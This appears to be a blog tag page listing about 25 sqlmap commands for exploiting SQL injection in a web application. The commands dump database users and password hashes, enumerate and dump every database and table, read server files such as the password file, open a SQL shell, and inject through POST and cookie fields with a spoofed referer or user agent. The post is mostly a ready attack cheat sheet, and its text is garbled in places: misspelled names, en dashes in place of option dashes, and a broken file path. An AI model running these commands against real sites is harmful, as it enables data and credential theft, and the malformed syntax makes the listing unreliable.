Posts Tagged ‘SQLMap’

Some useful sqlmap command for testing SQL injection vulnerability.

1) — Analyzing the current user is dba
python sqlmap.py -u “url” –is-dba -v 1
2) — users: user list database management system
python sqlmap.py -u “url” –users -v 0
3) — passwords: Database user password (hash)
python sqlmap.py -u “url” –passwords -v 0
python sqlmap.py -u “url” –passwords -U sa -v 0
4) To view the user permissions
python sqlmap.py -u “url” –privileges -v 0
python sqlmap.py -u “url” –privileges -U postgres -v 0
5) — dbs can use the database
python sqlmap.py -u “url” –dbs -v 0
6) — tables column in a table
python sqlmap.py -u “url” –tables -D “information_scheam”
-D: Specifies the name of the data
7) — columns are listed in the table column names
python sqlmap.py -u “url” –columns -T “user” -D “mysql” -v 1
-T: Specify the table name, -D: Specifies the library name
8) — dump the contents of the column specified in the list
python sqlmap.py -u “url” –dump -T “users” -D “testdb”
-C: You can specify fields
The specified column in the range of 2-4
python sqlmap.py -u “url” –dump -T “users” -D “testdb” –start 2 –stop 4 -v 0
9) — dumap-all List all databases, all tables content
python sqlmap.py -u “url” –dump-all -v 0
Only lists the contents of the user’s own new database and tables
python sqlmap.py -u “url” –dump-all –exclude-sysdbs -v 0
10) — file to read the content of the document [load_file () function]
python sqlmap.py -u “url” –file / etc / password
11) execute SQL
python sqlmap.py -u “url” –sql-shell
12) -p parameter specified
python sqlmap.py -u “url” -v 1 -p “id”
You can specify multiple -p parameter -p “cat, id”
13) POST submission
python sqlmap.py -u “url” –method POST –data “id = 1”
14) COOKIE Submit
python sqlmap.py -u “url” –cookie “id = 1” -v 1
cookie value can be crawled by the TamperData
15) refer to deceive
python sqlmap.py -u “url” –refer “url” -v 3
16) using a custom user-agent or user-agents.txt
python sqlmap.py -u “url” –user-agent “Mozilla / 4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3
python sqlmap.py -u “url” -v 1 -a “./txt/user-agents.txt”
17) use of multithreading guess solution
python sqlmap.py -u “url” -v 1 –current-user –threads 3
18) specify the database, bypassing the automatic detection SQLMAP
python sqlmap.py -u “url” -v 2 –dbms “PostgreSQL”
19) Specifies the operating system automatically detects the bypass SQLMAP
python sqlmap.py -u “url” -v 2 –os “Windows”
20) — prefix and –postfix custom payload
python sqlmap.py -u “url” -v 3 -p “id” –prefix ” ‘” –postfix “and’ test ‘=’ test”
21) union injection test
python sqlmap.py -u “url” –union-test -v -1
22) with the order by
python sqlmap.py -u “url” –union-test –union-tech orderby -v 1
23) python sqlmap.py -u “url” -v 1 –union-use –banner
24) python sqlmap.py -u “url” -v 5 –union-use –current-user
25) python sqlmap.py -u “url” -v 1 –union-use –dbs